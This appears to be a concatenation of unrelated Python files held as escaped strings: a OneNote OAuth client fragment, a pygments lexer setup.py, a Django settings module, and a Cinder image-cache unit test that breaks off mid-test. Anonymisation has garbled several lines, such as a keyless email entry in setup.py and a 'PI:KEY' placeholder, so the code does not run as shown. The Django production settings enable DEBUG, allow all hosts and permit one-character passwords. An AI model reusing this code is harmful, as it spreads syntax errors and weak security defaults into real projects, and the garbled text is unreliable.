get_credentials(self):\r\n """"""Return the actual credentials of this OAuth Instance\r\n :return client_id:""""""\r\n return self.client_id, self.client_secret, self.code, self.token, self.rtoken\r\n\r\n\r\nclass OneNote(OAuth):\r\n """"""This class wraps some OneNote specific calls""""""\r\n def __init__(self, client_id, client_secret, code, token, rtoken):\r\n super().__init__(client_id, client_secret, code, token, rtoken)\r\n self.base = ""https://www.onenote.com/api/v1.0/me/""\r\n\r\n def list_notebooks(self):\r\n url = self.base + ""notes/notebooks""\r\n query = {\'top\': \'5\'}\r\n result = self.get(url, query)\r\n n = None\r\n if (result):\r\n notebooks = result.json()\r\n # result_serialized = json.dumps(result.text)\r\n # notebook = json.loads(result_serialized)\r\n n = notebooks[""value""][0]\r\n x = 1\r\n return n\r\n\r\n def post_page(self, section_id: str, created, title: str, content: str, files: list = None):\r\n """"""post a page. If you want to provide additional images to the page provide them as file list\r\n in the same way like posting multipart message in \'requests\'\r\n .:param content: valid html text with Umlaute converted to ä""""""\r\n url = self.base + ""notes/sections/"" + section_id + ""/pages""\r\n headers = {""Content-Type"": ""application/xhtml+xml""}\r\n # the basic layout of a page is always same\r\n data = """"""\r\n\r\n \r\n {0}\r\n \r\n \r\n \r\n
    \r\n {2}\r\n
    \r\n \r\n\r\n"""""".format(title, created, content)\r\n result = None\r\n if files:\r\n ""post as multipart""\r\n newFiles = [(\'Presentation\', (None, data, \'application/xhtml+xml\', {\'Content-Encoding\': \'utf8\'}))]\r\n newFiles.extend(files)\r\n result = self.post(url, {}, None, files=newFiles)\r\n else:\r\n ""post as simple request""\r\n result = self.post(url, headers, data)\r\n n = None\r\n if (result):\r\n notebooks = result.json()\r\n # result_serialized = json.dumps(result.text)\r\n # notebook = json.loads(result_serialized)\r\n # n = notebooks[""value""][0]\r\n x = 1\r\n return notebooks\r\n', '""""""pygments-sisal module setup script for distribution.""""""\n\nfrom __future__ import with_statement\n\nimport os\nimport setuptools\n\n\ndef get_version(filename):\n with open(filename) as fh:\n for line in fh:\n if line.startswith(\'__version__\'):\n return line.split(\'=\')[-1].strip()[1:-1]\n\n\nsetuptools.setup(\n name=\'pygments-sisal\',\n version=get_version(os.path.join(\'pygments_sisal\', \'__init__.py\')),\n author=\'Alexander Asp Bock\',\n dummy@email.com\',\n platforms=\'All\',\n description=(\'A pygments lexer for SISAL\'),\n install_requires=[\'Pygments>=2.0\'],\n license=\'MIT\',\n keywords=\'pygments, lexer, sisal\',\n url=\'https://github.com/MisanthropicBit/pygments-sisal\',\n packages=setuptools.find_packages(),\n long_description=open(\'README.md\').read(),\n classifiers=[\n \'Development Status :: 5 - Production/Stable\',\n \'Intended Audience :: Developers\',\n \'Topic :: Utilities\',\n \'License :: OSI Approved :: MIT License\',\n \'Programming Language :: Python :: 2.6\',\n \'Programming Language :: Python :: 2.7\',\n \'Programming Language :: Python :: 3\',\n \'Programming Language :: Python :: 3.2\',\n \'Programming Language :: Python :: 3.3\',\n \'Programming Language :: Python :: 3.4\',\n \'Programming Language :: Python :: 3.5\'\n ],\n # Pygments entry point\n entry_points=""[pygments.lexers]\\n""\n ""sisal=pygments_sisal:SisalLexer""\n)\n', '# -*- coding: utf-8 -*-\n""""""\nDjango settings for saefacto project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/dev/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/dev/ref/settings/\n""""""\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nimport os\nfrom os.path import join\n\n# See: http://django-storages.readthedocs.org/en/latest/backends/amazon-S3.html#settings\ntry:\n from S3 import CallingFormat\n AWS_CALLING_FORMAT = CallingFormat.SUBDOMAIN\nexcept ImportError:\n # TODO: Fix this where even if in Dev this class is called.\n pass\n\nfrom configurations import Configuration, values\n\nBASE_DIR = os.path.dirname(os.path.dirname(__file__))\n\n\nclass Common(Configuration):\n\n ########## APP CONFIGURATION\n DJANGO_APPS = (\n # Default Django apps:\n \'django.contrib.auth\',\n \'django.contrib.contenttypes\',\n \'django.contrib.sessions\',\n \'django.contrib.sites\',\n \'django.contrib.messages\',\n \'django.contrib.staticfiles\',\n\n # Useful template tags:\n # \'django.contrib.humanize\',\n # \'suit\',\n # Admin\n \'django.contrib.admin\',\n \'django.contrib.admindocs\',\n )\n THIRD_PARTY_APPS = (\n \'south\', # Database migration helpers:\n \'crispy_forms\', # Form layouts\n \'avatar\', # for user avatars\n \'sitetree\',\n \'sitetree_smartadmin\',\n \'django_user_agents\',\n \'statici18n\', # javascript\n \'parsley\',\n\n )\n\n # Apps specific for this project go here.\n LOCAL_APPS = (\n 
\'users\', # custom users app\n \'core\',\n \'main\',\n )\n\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#installed-apps\n INSTALLED_APPS = DJANGO_APPS + THIRD_PARTY_APPS + LOCAL_APPS\n\n INSTALLED_APPS += (\n # Needs to come last for now because of a weird edge case between\n # South and allauth\n \'allauth\', # registration\n \'allauth.account\', # registration\n \'allauth.socialaccount\', # registration\n )\n ########## END APP CONFIGURATION\n\n ########## MIDDLEWARE CONFIGURATION\n MIDDLEWARE_CLASSES = (\n \'django.contrib.sessions.middleware.SessionMiddleware\',\n \'django.middleware.common.CommonMiddleware\',\n \'django.middleware.csrf.CsrfViewMiddleware\',\n \'django.contrib.auth.middleware.AuthenticationMiddleware\',\n \'django.contrib.messages.middleware.MessageMiddleware\',\n \'django.middleware.clickjacking.XFrameOptionsMiddleware\',\n \'django_user_agents.middleware.UserAgentMiddleware\',\n )\n ########## END MIDDLEWARE CONFIGURATION\n\n ########## DEBUG\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#debug\n DEBUG = values.BooleanValue(False)\n\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#template-debug\n TEMPLATE_DEBUG = DEBUG\n ########## END DEBUG\n\n ########## SECRET CONFIGURATION\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#secret-key\n # Note: This key only used for development and testing.\n # In production, this is changed to a values.SecretValue() setting\n SECRET_KEY = ""CHANGEME!!!""\n ########## END SECRET CONFIGURATION\n\n ########## FIXTURE CONFIGURATION\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#std:setting-FIXTURE_DIRS\n FIXTURE_DIRS = (\n join(BASE_DIR, \'fixtures\'),\n )\n ########## END FIXTURE CONFIGURATION\n\n ########## EMAIL CONFIGURATION\n EMAIL_BACKEND = values.Value(\'django.core.mail.backends.smtp.EmailBackend\')\n ########## END EMAIL CONFIGURATION\n\n ########## MANAGER CONFIGURATION\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#admins\n ADMINS = (\n (\'Fábio C. 
Barrionuevo da Luz\', dummy@email.com\'),\n )\n\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#managers\n MANAGERS = ADMINS\n ########## END MANAGER CONFIGURATION\n\n ########## DATABASE CONFIGURATION\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#databases\n DATABASES = values.DatabaseURLValue(\'postgres://localhost/saefacto\')\n ########## END DATABASE CONFIGURATION\n\n ########## CACHING\n # Do this here because thanks to django-pylibmc-sasl and pylibmc memcacheify is painful to install on windows.\n # memcacheify is what\'s used in Production\n CACHES = {\n \'default\': {\n \'BACKEND\': \'django.core.cache.backends.locmem.LocMemCache\',\n \'LOCATION\': \'\'\n }\n }\n ########## END CACHING\n\n ########## GENERAL CONFIGURATION\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#time-zone\n TIME_ZONE = \'America/Araguaina\'\n\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#language-code\n LANGUAGE_CODE = \'pt-br\'\n LANGUAGES = (\n (\'pt-br\', u\'Português do Brasil\'),\n (\'en\', \'English\'),\n (\'es\', u\'Español\'),\n )\n\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#site-id\n SITE_ID = 1\n\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#use-i18n\n USE_I18N = True\n\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#use-l10n\n USE_L10N = True\n\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#use-tz\n USE_TZ = True\n ########## END GENERAL CONFIGURATION\n\n ########## TEMPLATE CONFIGURATION\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#template-context-processors\n TEMPLATE_CONTEXT_PROCESSORS = (\n \'django.contrib.auth.context_processors.auth\',\n ""allauth.account.context_processors.account"",\n ""allauth.socialaccount.context_processors.socialaccount"",\n \'django.core.context_processors.debug\',\n \'django.core.context_processors.i18n\',\n \'django.core.context_processors.media\',\n \'django.core.context_processors.static\',\n \'django.core.context_processors.tz\',\n \'django.contrib.messages.context_processors.messages\',\n \'django.core.context_processors.request\',\n # Your stuff: custom template context processers go here\n )\n\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#template-dirs\n TEMPLATE_DIRS = (\n join(BASE_DIR, \'templates\'),\n )\n\n TEMPLATE_LOADERS = (\n \'django.template.loaders.filesystem.Loader\',\n \'django.template.loaders.app_directories.Loader\',\n )\n\n # See: http://django-crispy-forms.readthedocs.org/en/latest/install.html#template-packs\n CRISPY_TEMPLATE_PACK = \'bootstrap3\'\n ########## END TEMPLATE CONFIGURATION\n\n ########## STATIC FILE CONFIGURATION\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#static-root\n STATIC_ROOT = join(os.path.dirname(BASE_DIR), \'staticfiles\')\n\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#static-url\n STATIC_URL = \'/static/\'\n\n # See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#std:setting-STATICFILES_DIRS\n STATICFILES_DIRS = (\n join(BASE_DIR, \'static\'),\n )\n\n # See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#staticfiles-finders\n STATICFILES_FINDERS = (\n \'django.contrib.staticfiles.finders.FileSystemFinder\',\n \'django.contrib.staticfiles.finders.AppDirectoriesFinder\',\n )\n ########## END STATIC FILE CONFIGURATION\n\n ########## MEDIA CONFIGURATION\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#media-root\n MEDIA_ROOT = join(BASE_DIR, \'media\')\n\n # See: 
https://docs.djangoproject.com/en/dev/ref/settings/#media-url\n MEDIA_URL = \'/media/\'\n ########## END MEDIA CONFIGURATION\n\n ########## URL Configuration\n ROOT_URLCONF = \'config.urls\'\n\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#wsgi-application\n WSGI_APPLICATION = \'config.wsgi.application\'\n ########## End URL Configuration\n\n ########## AUTHENTICATION CONFIGURATION\n AUTHENTICATION_BACKENDS = (\n ""django.contrib.auth.backends.ModelBackend"",\n ""allauth.account.auth_backends.AuthenticationBackend"",\n )\n\n # Some really nice defaults\n ACCOUNT_AUTHENTICATION_METHOD = ""username""\n ACCOUNT_EMAIL_REQUIRED = True\n ACCOUNT_EMAIL_VERIFICATION = ""mandatory""\n ACCOUNT_PASSWORD_MIN_LENGTH = 1\n ########## END AUTHENTICATION CONFIGURATION\n\n ########## Custom user app defaults\n # Select the correct user model\n AUTH_USER_MODEL = ""users.User""\n LOGIN_REDIRECT_URL = ""users:redirect""\n ########## END Custom user app defaults\n\n ########## SLUGLIFIER\n AUTOSLUG_SLUGIFY_FUNCTION = ""slugify.slugify""\n ########## END SLUGLIFIER\n\n ########## LOGGING CONFIGURATION\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#logging\n # A sample logging configuration. The only tangible logging\n # performed by this configuration is to send an email to\n # the site admins on every HTTP 500 error when DEBUG=False.\n # See http://docs.djangoproject.com/en/dev/topics/logging for\n # more details on how to customize your logging configuration.\n LOGGING = {\n \'version\': 1,\n \'disable_existing_loggers\': False,\n \'filters\': {\n \'require_debug_false\': {\n \'()\': \'django.utils.log.RequireDebugFalse\'\n }\n },\n \'handlers\': {\n \'mail_admins\': {\n \'level\': \'ERROR\',\n \'filters\': [\'require_debug_false\'],\n \'class\': \'django.utils.log.AdminEmailHandler\'\n }\n },\n \'loggers\': {\n \'django.request\': {\n \'handlers\': [\'mail_admins\'],\n \'level\': \'ERROR\',\n \'propagate\': True,\n },\n }\n }\n ########## END LOGGING CONFIGURATION\n\n\n ########## Your common stuff: Below this line define 3rd party libary settings\n\n\nclass Local(Common):\n\n ########## DEBUG\n DEBUG = values.BooleanValue(True)\n TEMPLATE_DEBUG = DEBUG\n ########## END DEBUG\n\n ########## INSTALLED_APPS\n INSTALLED_APPS = Common.INSTALLED_APPS\n ########## END INSTALLED_APPS\n\n ########## Mail settings\n EMAIL_HOST = ""localhost""\n EMAIL_PORT = 1025\n EMAIL_BACKEND = values.Value(\'django.core.mail.backends.console.EmailBackend\')\n ########## End mail settings\n ########## DATABASE CONFIGURATION\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#databases\n #DATABASES = values.DatabaseURLValue(\'postgres://localhost/projetosgt\')\n DATABASES = values.DatabaseURLValue(\'sqlite:////{0}.sqlite\'.format(join(BASE_DIR, \'sae_db\')))\n ########## END DATABASE CONFIGURATION\n\n ########## django-debug-toolbar\n MIDDLEWARE_CLASSES = Common.MIDDLEWARE_CLASSES + (\'debug_toolbar.middleware.DebugToolbarMiddleware\',)\n INSTALLED_APPS += (\'debug_toolbar\',)\n\n INTERNAL_IPS = (\'127.0.0.1\',)\n\n DEBUG_TOOLBAR_CONFIG = {\n \'INTERCEPT_REDIRECTS\': False,\n \'SHOW_TEMPLATE_CONTEXT\': True,\n }\n ########## end django-debug-toolbar\n\n ########## Your local stuff: Below this line define 3rd party libary settings\n #SITETREE_MODEL_TREE = \'sitetree_smartadmin.SmartTree\'\n SITETREE_MODEL_TREE_ITEM = \'sitetree_smartadmin.SmartTreeItem\'\n\nclass Production(Common):\n\n ########## INSTALLED_APPS\n INSTALLED_APPS = Common.INSTALLED_APPS\n INSTALLED_APPS += 
(\'allauth.socialaccount.providers.facebook\',\n \'allauth.socialaccount.providers.github\', )\n ########## END INSTALLED_APPS\n\n ########## SECRET KEY\n SECRET_KEY = values.SecretValue()\n ########## END SECRET KEY\n\n ########## django-secure\n INSTALLED_APPS += (""djangosecure"", )\n\n # set this to 60 seconds and then to 518400 when you can prove it works\n SECURE_HSTS_SECONDS = 60\n SECURE_HSTS_INCLUDE_SUBDOMAINS = values.BooleanValue(True)\n SECURE_FRAME_DENY = values.BooleanValue(True)\n SECURE_CONTENT_TYPE_NOSNIFF = values.BooleanValue(True)\n SECURE_BROWSER_XSS_FILTER = values.BooleanValue(True)\n SESSION_COOKIE_SECURE = values.BooleanValue(False)\n SESSION_COOKIE_HTTPONLY = values.BooleanValue(True)\n SECURE_SSL_REDIRECT = values.BooleanValue(True)\n ########## end django-secure\n\n ########## SITE CONFIGURATION\n # Hosts/domain names that are valid for this site\n # See https://docs.djangoproject.com/en/1.6/ref/settings/#allowed-hosts\n ALLOWED_HOSTS = [""*""]\n ########## END SITE CONFIGURATION\n\n INSTALLED_APPS += (""gunicorn"", )\n\n ########## STORAGE CONFIGURATION\n # See: http://django-storages.readthedocs.org/en/latest/index.html\n INSTALLED_APPS += (\n \'storages\',\n )\n\n # See: http://django-storages.readthedocs.org/en/latest/backends/amazon-S3.html#settings\n STATICFILES_STORAGE = DEFAULT_FILE_STORAGE = \'storages.backends.s3boto.S3BotoStorage\'\n\n # See: http://django-storages.readthedocs.org/en/latest/backends/amazon-S3.html#settings\n AWS_ACCESS_KEY_ID = values.SecretValue()\n AWS_SECRET_ACCESS_KEY = values.SecretValue()\n AWS_STORAGE_BUCKET_NAME = values.SecretValue()\n AWS_AUTO_CREATE_BUCKET = True\n AWS_QUERYSTRING_AUTH = False\n\n # see: https://github.com/antonagestam/collectfast\n AWS_PRELOAD_METADATA = True\n INSTALLED_APPS += (""collectfast"", )\n\n # AWS cache settings, don\'t change unless you know what you\'re doing:\n AWS_EXPIREY = 60 * 60 * 24 * 7\n AWS_HEADERS = {\n \'Cache-Control\': \'max-age=%d, s-maxage=%d, must-revalidate\' % (AWS_EXPIREY,\n AWS_EXPIREY)\n }\n\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#static-url\n STATIC_URL = \'https://s3.amazonaws.com/%s/\' % AWS_STORAGE_BUCKET_NAME\n ########## END STORAGE CONFIGURATION\n\n ########## EMAIL\n DEFAULT_FROM_EMAIL = values.Value(\n \'saefacto dummy@email.com\')\n EMAIL_HOST = values.Value(\'smtp.sendgrid.com\')\n EMAIL_HOST_PASSWORD = values.SecretValue(environ_prefix="""", environ_name=""SENDGRID_PASSWORD"")\n EMAIL_HOST_USER = values.SecretValue(environ_prefix="""", environ_name=""SENDGRID_USERNAME"")\n EMAIL_PORT = values.IntegerValue(587, environ_prefix="""", environ_name=""EMAIL_PORT"")\n EMAIL_SUBJECT_PREFIX = values.Value(\'[saefacto] \', environ_name=""EMAIL_SUBJECT_PREFIX"")\n EMAIL_USE_TLS = True\n SERVER_EMAIL = EMAIL_HOST_USER\n ########## END EMAIL\n\n ########## TEMPLATE CONFIGURATION\n\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#template-dirs\n TEMPLATE_LOADERS = (\n (\'django.template.loaders.cached.Loader\', (\n \'django.template.loaders.filesystem.Loader\',\n \'django.template.loaders.app_directories.Loader\',\n )),\n )\n ########## END TEMPLATE CONFIGURATION\n\n ########## CACHING\n # Only do this here because thanks to django-pylibmc-sasl and pylibmc memcacheify is painful to install on windows.\n try:\n # See: https://github.com/rdegges/django-heroku-memcacheify\n from memcacheify import memcacheify\n CACHES = memcacheify()\n except ImportError:\n CACHES = values.CacheURLValue(default=""memcached://127.0.0.1:11211"")\n ########## END 
CACHING\n\n ########## Your production stuff: Below this line define 3rd party libary settings\n\n ########## DEBUG\n DEBUG = values.BooleanValue(True)\n TEMPLATE_DEBUG = DEBUG\n ########## END DEBUG\n ########## django-debug-toolbar\n MIDDLEWARE_CLASSES = Common.MIDDLEWARE_CLASSES + (\'debug_toolbar.middleware.DebugToolbarMiddleware\',)\n INSTALLED_APPS += (\'debug_toolbar\',)\n\n INTERNAL_IPS = (\'127.0.0.1\',)\n\n DEBUG_TOOLBAR_CONFIG = {\n \'DISABLE_PANELS\': [\'debug_toolbar.panels.redirects.RedirectsPanel\'],\n \'SHOW_TEMPLATE_CONTEXT\': True,\n }\n ########## end django-debug-toolbar\n\n\n#######################################################################################\n# hack terrivelmente feio para fazer o Pycharm identificar as bibliotecas\n# o codigo abaixo nunca sera executado\nif 1 == 2:\n INSTALLED_APPS = (\n # Default Django apps:\n \'django.contrib.auth\',\n \'django.contrib.contenttypes\',\n \'django.contrib.sessions\',\n \'django.contrib.sites\',\n \'django.contrib.messages\',\n \'django.contrib.staticfiles\',\n\n # Useful template tags:\n # \'django.contrib.humanize\',\n\n # Admin\n \'django.contrib.admin\',\n\n \'south\', # Database migration helpers:\n \'crispy_forms\', # Form layouts\n \'avatar\', # for user avatars\n \'sitetree\',\n \'sitetree_smartadmin\',\n \'django_user_agents\',\n \'statici18n\', # javascript\n\n \'users\', # custom users app\n \'core\',\n \'main\',\n\n # Needs to come last for now because of a weird edge case between\n # South and allauth\n \'allauth\', # registration\n \'allauth.account\', # registration\n \'allauth.socialaccount\', # registration\n )\n ########## END APP CONFIGURATION\n\n ########## MIDDLEWARE CONFIGURATION\n MIDDLEWARE_CLASSES = (\n \'django.contrib.sessions.middleware.SessionMiddleware\',\n \'django.middleware.common.CommonMiddleware\',\n \'django.middleware.csrf.CsrfViewMiddleware\',\n \'django.contrib.auth.middleware.AuthenticationMiddleware\',\n \'django.contrib.messages.middleware.MessageMiddleware\',\n \'django.middleware.clickjacking.XFrameOptionsMiddleware\',\n )\n ########## END MIDDLEWARE CONFIGURATION\n\n ########## DEBUG\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#debug\n DEBUG = True\n\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#template-debug\n TEMPLATE_DEBUG = DEBUG\n ########## END DEBUG\n\n ########## SECRET CONFIGURATION\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#secret-key\n # Note: This key only used for development and testing.\n # In production, this is changed to a values.SecretValue() setting\n SECRET_KEY = ""CHANGEME!!!""\n ########## END SECRET CONFIGURATION\n\n ########## FIXTURE CONFIGURATION\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#std:setting-FIXTURE_DIRS\n FIXTURE_DIRS = (\n join(BASE_DIR, \'fixtures\'),\n )\n ########## END FIXTURE CONFIGURATION\n\n ########## EMAIL CONFIGURATION\n EMAIL_BACKEND = values.Value(\'django.core.mail.backends.smtp.EmailBackend\')\n ########## END EMAIL CONFIGURATION\n\n ########## MANAGER CONFIGURATION\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#admins\n ADMINS = (\n (\'Fábio C. 
Barrionuevo da Luz\', dummy@email.com\'),\n )\n\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#managers\n MANAGERS = ADMINS\n ########## END MANAGER CONFIGURATION\n\n ########## DATABASE CONFIGURATION\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#databases\n\n ########## END DATABASE CONFIGURATION\n\n ########## CACHING\n # Do this here because thanks to django-pylibmc-sasl and pylibmc memcacheify is painful to install on windows.\n # memcacheify is what\'s used in Production\n CACHES = {\n \'default\': {\n \'BACKEND\': \'django.core.cache.backends.locmem.LocMemCache\',\n \'LOCATION\': \'\'\n }\n }\n ########## END CACHING\n\n ########## GENERAL CONFIGURATION\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#time-zone\n TIME_ZONE = \'America/Los_Angeles\'\n\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#language-code\n LANGUAGE_CODE = \'en-us\'\n\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#site-id\n SITE_ID = 1\n\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#use-i18n\n USE_I18N = True\n\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#use-l10n\n USE_L10N = True\n\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#use-tz\n USE_TZ = True\n ########## END GENERAL CONFIGURATION\n\n ########## TEMPLATE CONFIGURATION\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#template-context-processors\n TEMPLATE_CONTEXT_PROCESSORS = (\n \'django.contrib.auth.context_processors.auth\',\n ""allauth.account.context_processors.account"",\n ""allauth.socialaccount.context_processors.socialaccount"",\n \'django.core.context_processors.debug\',\n \'django.core.context_processors.i18n\',\n \'django.core.context_processors.media\',\n \'django.core.context_processors.static\',\n \'django.core.context_processors.tz\',\n \'django.contrib.messages.context_processors.messages\',\n \'django.core.context_processors.request\',\n # Your stuff: custom template context processers go here\n )\n\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#template-dirs\n TEMPLATE_DIRS = (\n join(BASE_DIR, \'templates\'),\n )\n\n TEMPLATE_LOADERS = (\n \'django.template.loaders.filesystem.Loader\',\n \'django.template.loaders.app_directories.Loader\',\n )\n\n # See: http://django-crispy-forms.readthedocs.org/en/latest/install.html#template-packs\n CRISPY_TEMPLATE_PACK = \'bootstrap3\'\n ########## END TEMPLATE CONFIGURATION\n\n ########## STATIC FILE CONFIGURATION\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#static-root\n STATIC_ROOT = join(os.path.dirname(BASE_DIR), \'staticfiles\')\n\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#static-url\n STATIC_URL = \'/static/\'\n\n # See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#std:setting-STATICFILES_DIRS\n STATICFILES_DIRS = (\n join(BASE_DIR, \'static\'),\n )\n\n # See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#staticfiles-finders\n STATICFILES_FINDERS = (\n \'django.contrib.staticfiles.finders.FileSystemFinder\',\n \'django.contrib.staticfiles.finders.AppDirectoriesFinder\',\n )\n ########## END STATIC FILE CONFIGURATION\n\n ########## MEDIA CONFIGURATION\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#media-root\n MEDIA_ROOT = join(BASE_DIR, \'media\')\n\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#media-url\n MEDIA_URL = \'/media/\'\n ########## END MEDIA CONFIGURATION\n\n ########## URL Configuration\n ROOT_URLCONF = \'config.urls\'\n\n # See: 
https://docs.djangoproject.com/en/dev/ref/settings/#wsgi-application\n WSGI_APPLICATION = \'config.wsgi.application\'\n ########## End URL Configuration\n\n ########## AUTHENTICATION CONFIGURATION\n AUTHENTICATION_BACKENDS = (\n ""django.contrib.auth.backends.ModelBackend"",\n ""allauth.account.auth_backends.AuthenticationBackend"",\n )\n\n # Some really nice defaults\n ACCOUNT_AUTHENTICATION_METHOD = ""username""\n ACCOUNT_EMAIL_REQUIRED = True\n ACCOUNT_EMAIL_VERIFICATION = ""mandatory""\n ########## END AUTHENTICATION CONFIGURATION\n\n ########## Custom user app defaults\n # Select the correct user model\n AUTH_USER_MODEL = ""users.User""\n LOGIN_REDIRECT_URL = ""users:redirect""\n ########## END Custom user app defaults\n\n ########## SLUGLIFIER\n AUTOSLUG_SLUGIFY_FUNCTION = ""slugify.slugify""\n ########## END SLUGLIFIER\n\n ########## LOGGING CONFIGURATION\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#logging\n # A sample logging configuration. The only tangible logging\n # performed by this configuration is to send an email to\n # the site admins on every HTTP 500 error when DEBUG=False.\n # See http://docs.djangoproject.com/en/dev/topics/logging for\n # more details on how to customize your logging configuration.\n LOGGING = {\n \'version\': 1,\n \'disable_existing_loggers\': False,\n \'filters\': {\n \'require_debug_false\': {\n \'()\': \'django.utils.log.RequireDebugFalse\'\n }\n },\n \'handlers\': {\n \'mail_admins\': {\n \'level\': \'ERROR\',\n \'filters\': [\'require_debug_false\'],\n \'class\': \'django.utils.log.AdminEmailHandler\'\n }\n },\n \'loggers\': {\n \'django.request\': {\n \'handlers\': [\'mail_admins\'],\n \'level\': \'ERROR\',\n \'propagate\': True,\n },\n }\n }\n ########## END LOGGING CONFIGURATION\n\n\n ########## Your common stuff: Below this line define 3rd party libary settings\n', '# Copyright (C) 2015 Pure Storage, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the ""License""); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an ""AS IS"" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom datetime import timedelta\nimport ddt\nimport mock\n\nfrom oslo_utils import timeutils\n\nfrom cinder import context as ctxt\nfrom cinder.db.sqlalchemy import models\nfrom cinder.image import cache as image_cache\nfrom cinder import objects\nfrom cinder import test\nfrom cinder.tests.unit import fake_constants as fake\n\n\n@ddt.ddt\nclass ImageVolumeCacheTestCase(test.TestCase):\n\n def setUp(self):\n super(ImageVolumeCacheTestCase, self).setUp()\n self.mock_db = mock.Mock()\n self.mock_volume_api = mock.Mock()\n self.context = ctxt.get_admin_context()\n self.volume = models.Volume()\n vol_params = {\'id\': fake.VOLUME_ID,\n \'host\': \'foo@bar#whatever\',\n \'cluster_name\': \'cluster\',\n \'size\': 0}\n self.volume.update(vol_params)\n self.volume_ovo = objects.Volume(self.context, **vol_params)\n\n def _build_cache(self, max_gb=0, max_count=0):\n cache = image_cache.ImageVolumeCache(self.mock_db,\n self.mock_volume_api,\n max_gb,\n max_count)\n cache.notifier = self.notifier\n return cache\n\n def _build_entry(self, size=10):\n entry = {\n \'id\': 1,\n \'host\': \'test@foo#bar\',\n \'cluster_name\': \'cluster@foo#bar\',\n \'image_id\': \'PI:KEY\',\n \'image_updated_at\': timeutils.utcnow(with_timezone=True),\n \'volume_id\': \'70a599e0-31e7-49b7-b260-868f441e862b\',\n \'size\': size,\n \'last_used\': timeutils.utcnow(with_timezone=True)\n }\n return entry\n\n def test_get_by_image_volume(self):\n cache = self._build_cache()\n ret = {\'id\': 1}\n volume_id = \'70a599e0-31e7-49b7-b260-868f441e862b\'\n self.mock_db.image_volume_cache_get_by_volume_id.return_value = ret\n entry = cache.get_by_image_volume(self.context, volume_id)\n self.assertEqual(ret, entry)\n\n self.mock_db.image_volume_cache_get_by_volume_id.return_value = None\n entry = cache.get_by_image_volume(self.context, volume_id)\n self.assertIsNone(entry)\n\n def test_evict(self):\n cache = self._build_cache()\n entry = self._build_entry()\n cache.evict(self.context, entry)\n self.mock_db.image_volume_cache_delete.assert_called_once_with(\n self.context,\n entry[\'volume_id\']\n )\n\n msg = self.notifier.notifications[0]\n self.assertEqual(\'image_volume_cache.evict\', msg[\'event_type\'])\n self.assertEqual(\'INFO\', msg[\'priority\'])\n self.assertEqual(entry[\'host\'], msg[\'payload\'][\'host\'])\n self.assertEqual(entry[\'image_id\'], msg[\'payload\'][\'image_id\'])\n self.assertEqual(1, len(self.notifier.notifications))\n\n @ddt.data(True, False)\n def test_get_entry(self, clustered):\n cache = self._build_cache()\n entry = self._build_entry()\n image_meta = {\n \'is_public\': True,\n \'owner\': \'70a599e0-31e7-49b7-b260-868f441e862b\',\n \'properties\': {\n \'virtual_size\': \'1.7\'\n },\n \'updated_at\': entry[\'image_updated_at\']\n }\n (self.mock_db.\n image_volume_cache_get_and_update_last_used.return_value) = entry\n if not clustered:\n self.volume_ovo.cluster_name = None\n expect = {\'host\': self.volume.host}\n else:\n expect = {\'cluster_name\': self.volume.cluster_name}\n found_entry = cache.get_entry(self.context,\n self.volume_ovo,\n entry[\'image_id\'],\n image_meta)\n self.assertDictEqual(entry, found_entry)\n (self.mock_db.\n image_volume_cache_get_and_update_last_used.assert_called_once_with)(\n self.context,\n entry[\'image_id\'],\n **expect\n )\n\n msg = self.notifier.notifications[0]\n self.assertEqual(\'image_volume_cache.hit\', 